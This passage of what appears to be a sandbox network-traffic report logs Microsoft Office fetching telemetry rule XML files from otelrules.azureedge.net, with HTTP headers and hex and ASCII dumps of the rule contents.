49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.4	49757	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:02 UTC	192	OUT	GET /rules/rule120624v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:02 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:02 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB7010D66" x-ms-request-id: 7f7db364-701e-005c-2f05-2dbb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063302Z-16547b76f7fnlcwwhC1DFWz6gw00000007v000000000b4e2 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:02 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.4	49755	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:02 UTC	192	OUT	GET /rules/rule120623v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:02 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:02 GMT Content-Type: text/xml Content-Length: 464 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97FB6C3C" x-ms-request-id: 63ea3643-901e-0015-3101-2db284000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063302Z-16547b76f7f4k79zhC1DFWu9y000000007wg000000002mv0 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:02 UTC	464	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.4	49758	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:02 UTC	192	OUT	GET /rules/rule120625v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:02 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:02 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT ETag: "0x8DC582B9748630E" x-ms-request-id: cc46dee9-d01e-007a-0efd-2cf38c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063302Z-16547b76f7fxdzxghC1DFWmf7n00000007yg000000002aqd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:02 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.4	49759	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:02 UTC	192	OUT	GET /rules/rule120626v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:02 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:02 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DACDF62" x-ms-request-id: 764b7f95-c01e-00a1-1c00-2d7e4a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063302Z-16547b76f7f7rtshhC1DFWrtqn00000007v00000000057rm x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:02 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.4	49761	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:02 UTC	192	OUT	GET /rules/rule120628v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:03 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:02 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C8E04C8" x-ms-request-id: 1e45a1cf-401e-0029-3ef1-2c9b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063302Z-16547b76f7f76p6chC1DFWctqw00000007xg000000004h2b x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:03 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.4	49760	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:02 UTC	192	OUT	GET /rules/rule120627v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:03 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:03 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT ETag: "0x8DC582B9E8EE0F3" x-ms-request-id: d33e01be-001e-0082-0958-2e5880000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063303Z-15869dbbcc6pfq2ghC1DFWmp140000000100000000006rez x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 06:33:03 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.4	49762	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:02 UTC	192	OUT	GET /rules/rule120629v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:03 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:03 GMT Content-Type: text/xml Content-Length: 428 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC4F34CA" x-ms-request-id: 2398beba-501e-007b-298e-2d5ba2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063303Z-15869dbbcc6xpvqthC1DFWq7d80000000180000000005vc6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:03 UTC	428	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.4	49763	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:03 UTC	192	OUT	GET /rules/rule120630v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:03 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:03 GMT Content-Type: text/xml Content-Length: 499 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT ETag: "0x8DC582B98CEC9F6" x-ms-request-id: 8e718dad-301e-0051-6df1-2c38bb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063303Z-16547b76f7fxsvjdhC1DFWprrs00000007pg0000000095t3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:03 UTC	499	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.4	49764	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:03 UTC	192	OUT	GET /rules/rule120631v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:03 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:03 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B988EBD12" x-ms-request-id: d92822fd-901e-0048-0b55-2eb800000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063303Z-17df447cdb5c9wvxhC1DFWn08n00000004500000000054sg x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:03 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.4	49765	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:03 UTC	192	OUT	GET /rules/rule120632v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:04 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:03 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5815C4C" x-ms-request-id: 6b3fdf92-c01e-008e-384a-2e7381000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063303Z-15869dbbcc6qwghvhC1DFWssds000000044g00000000fcen x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:04 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.4	49766	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:03 UTC	192	OUT	GET /rules/rule120633v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:04 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:03 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB32BB5CB" x-ms-request-id: d4023ec4-f01e-00aa-5355-2e8521000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063303Z-17df447cdb5wrr5fhC1DFWte8n000000043g00000000ctr8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:04 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.4	49767	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:03 UTC	192	OUT	GET /rules/rule120634v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:04 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:03 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8972972" x-ms-request-id: 2361c5fe-901e-0064-45f6-2ce8a6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063303Z-16547b76f7fknvdnhC1DFWxnys00000007wg000000001f0q x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
